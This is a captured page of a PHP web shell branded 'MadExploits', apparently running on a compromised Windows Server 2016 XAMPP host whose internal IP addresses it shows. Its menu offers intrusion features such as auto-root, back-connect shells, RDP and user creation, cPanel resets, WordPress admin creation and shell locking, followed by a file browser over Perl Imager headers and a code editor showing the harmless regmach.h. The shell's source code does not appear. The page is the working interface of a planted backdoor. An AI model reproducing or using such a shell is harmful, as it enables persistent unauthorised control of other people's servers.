Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
Imager /
include /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
draw.h
539
B
-rw-rw-rw-
dynaload.h
1.18
KB
-rw-rw-rw-
ext.h
1.89
KB
-rw-rw-rw-
feat.h
383
B
-rw-rw-rw-
imager.h
19
KB
-rw-rw-rw-
imageri.h
4.98
KB
-rw-rw-rw-
imconfig.h
639
B
-rw-rw-rw-
imdatatypes.h
24.76
KB
-rw-rw-rw-
imerror.h
905
B
-rw-rw-rw-
imexif.h
256
B
-rw-rw-rw-
imext.h
14.32
KB
-rw-rw-rw-
imextdef.h
247
B
-rw-rw-rw-
imextpl.h
1.2
KB
-rw-rw-rw-
imextpltypes.h
891
B
-rw-rw-rw-
imexttypes.h
15.04
KB
-rw-rw-rw-
imio.h
512
B
-rw-rw-rw-
immacros.h
5.99
KB
-rw-rw-rw-
imperl.h
711
B
-rw-rw-rw-
imperlio.h
122
B
-rw-rw-rw-
imrender.h
874
B
-rw-rw-rw-
iolayer.h
1.49
KB
-rw-rw-rw-
iolayert.h
2.97
KB
-rw-rw-rw-
log.h
1.52
KB
-rw-rw-rw-
plug.h
1.74
KB
-rw-rw-rw-
ppport.h
183
KB
-rw-rw-rw-
regmach.h
2.69
KB
-rw-rw-rw-
rendert.h
284
B
-rw-rw-rw-
stackmach.h
328
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : regmach.h
#ifndef _REGMACH_H_ #define _REGMACH_H_ #include <stdio.h> #include <math.h> #include "imager.h" enum rm_byte_codes { rbc_add, /* ra + rb -> r*/ rbc_subtract, /* ra - rb -> r */ rbc_mult, /* ra * rb -> r */ rbc_div, /* ra / rb -> r */ rbc_mod, /* ra % rb -> r */ rbc_pow, /* ra ** rb -> r */ rbc_uminus, /* -ra -> r */ rbc_multp, /* pa ** rb -> p */ rbc_addp, /* pa + pb -> p */ rbc_subtractp, /* pa - pb -> p */ /* rbcParm, we just preload a register */ rbc_sin, /* sin(ra) -> r */ rbc_cos, /* cos(ra) -> r */ rbc_atan2, /* atan2(ra,rb) -> r */ rbc_sqrt, /* sqrt(ra) -> r */ rbc_distance, /* distance(rx, ry, rx, ry) -> r */ /* getp? codes must be in order */ rbc_getp1, /* getp1(ra, rb) -> p */ rbc_getp2, /* getp2(ra, rb) -> p */ rbc_getp3, /* getp3(ra, rb) -> p */ rbc_value, /* value(pa) -> r */ rbc_hue, /* hue(pa) -> r */ rbc_sat, /* sat(pa) -> r */ rbc_hsv, /* hsv(rh, rs, rv) -> p */ rbc_red, /* red(pa) -> r */ rbc_green, /* green(pa) -> r */ rbc_blue, /* blue(pa) -> r */ rbc_rgb, /* rgb(rr, rg, rb) -> p */ rbc_int, /* int(ra) -> r */ rbc_if, /* if(rc, rt, rf) -> r */ rbc_ifp, /* if(rc, pt, pf) -> p */ rbc_le, /* ra <= rb -> r */ rbc_lt, /* ra < rb -> r */ rbc_ge, /* ra >= rb -> r */ rbc_gt, /* ra > rb -> r */ rbc_eq, /* ra == rb -> r -- does approx equal */ rbc_ne, /* ra != rb -> r -- does approx equal */ rbc_and, /* ra && rb -> r */ rbc_or, /* ra || rb -> r */ rbc_not, /* !ra -> r */ rbc_abs, /* abs(ra) -> r */ rbc_ret, /* returns pa */ rbc_jump, /* jump to ja */ rbc_jumpz, /* jump if ra == 0 to jb */ rbc_jumpnz, /* jump if ra != 0 to jb */ rbc_set, /* ra -> r */ rbc_setp, /* pa -> p*/ rbc_print, /* print(ra) -> r -- prints, leaves on stack */ rbc_rgba, /* rgba(ra, rb, rc, rd) -> p */ rbc_hsva, /* hsva(ra, rb, rc, rd) -> p */ rbc_alpha, /* alpha(pa) -> r */ rbc_log, /* log(ra) -> r */ rbc_exp, /* exp(ra) -> r */ rbc_det, /* det(ra, rb, rc, rd) -> r */ rbc_op_count }; /* rm_word was originally char, but even for some simpler expressions I was getting close to running out of register numbers. It should also simplify structure alignment issues. (I hope.) */ typedef int rm_word; #define RM_WORD_PACK "i" struct rm_op { rm_word code; /* op code */ rm_word ra; /* first operand */ rm_word rb; /* possible second operand */ rm_word rc; /* possible third operand */ rm_word rd; /* possible fourth operand */ rm_word rout; /* output register */ }; i_color i_rm_run(struct rm_op codes[], size_t code_count, double n_regs[], size_t n_regs_count, i_color c_regs[], size_t c_regs_count, i_img *images[], size_t image_count); /* op_run(fx, sizeof(fx), parms, 2)) */ #endif /* _REGMACH_H_ */
Close